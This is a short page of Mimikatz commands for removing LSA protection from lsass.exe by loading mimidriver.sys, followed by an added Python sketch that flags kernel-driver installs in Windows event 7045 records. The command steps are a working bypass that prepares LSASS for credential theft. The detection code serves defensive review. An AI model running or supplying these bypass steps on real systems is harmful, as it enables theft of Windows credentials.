Mimikatz

LSA Protection Bypass

Check whether LSA runs as a protected process. If it does, the “RunAsPPL” value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa is set to 0x1.

Upload mimidriver.sys from the mimikatz repo to the same folder as mimikatz.exe, then load the driver.

mimikatz # !+

Remove the protection flags from the lsass.exe process.

mimikatz # !processprotect /process:lsass.exe /remove
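
Loading a kernel driver as in the steps above registers a driver service, which the Service Control Manager logs as System event 7045. As an added example (not part of the original page or of mimikatz), this Python sketch reviews such records for kernel drivers installed outside the usual driver directories; the event dictionaries, the trusted-directory list and the function names are constructed for illustration.

```python
import ntpath
import re

# Directories where driver services normally live. This list is an assumption
# for the sketch; replace it with the baseline of your own fleet.
TRUSTED_DIRS = (r"c:\windows\system32\drivers",
                r"c:\windows\system32\driverstore\filerepository")
# File name taken from the page. A file can be renamed, so this is a weak signal.
NAMED_DRIVERS = {"mimidriver.sys"}

def normalize(image_path, system_root=r"C:\Windows"):
    """Turn the ImagePath forms seen in 7045 records into a lower-case absolute path."""
    p = image_path.strip().strip('"')
    p = re.sub(r"^\\\?\?\\", "", p)                          # \??\C:\... -> C:\...
    p = re.sub(r"^(?:\\systemroot|%systemroot%)",            # \SystemRoot\..., %SystemRoot%\...
               lambda m: system_root, p, flags=re.I)
    if re.match(r"^system32\\", p, flags=re.I):              # relative form
        p = system_root + "\\" + p
    return ntpath.normpath(p).lower()                        # also collapses ..\ segments

def review(event):
    """Return the reasons a 7045 record deserves a look (empty list = none)."""
    if event.get("EventID") != 7045:
        return []
    if "kernel" not in event.get("ServiceType", "").lower():
        return []                                            # only kernel-mode drivers
    path = normalize(event.get("ImagePath", ""))
    reasons = []
    if not path.startswith(tuple(d + "\\" for d in TRUSTED_DIRS)):
        reasons.append("kernel driver outside trusted directories: " + path)
    if ntpath.basename(path) in NAMED_DRIVERS:
        reasons.append("driver file name matches a known tool")
    return reasons

# Constructed sample records (field names follow the 7045 EventData layout).
EVENTS = [
    {"EventID": 7045, "ServiceName": "exampledrv", "ServiceType": "kernel mode driver",
     "ImagePath": r"\??\C:\Users\Public\mimidriver.sys"},
    {"EventID": 7045, "ServiceName": "vendordrv", "ServiceType": "kernel mode driver",
     "ImagePath": r"\SystemRoot\System32\drivers\vendordrv.sys"},
    {"EventID": 7045, "ServiceName": "updater", "ServiceType": "user mode service",
     "ImagePath": r'"C:\Program Files\Vendor\updater.exe"'},
    {"EventID": 7045, "ServiceName": "oddpath", "ServiceType": "kernel mode driver",
     "ImagePath": r"system32\drivers\..\..\Temp\odd.sys"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(e["ServiceName"], review(e))
```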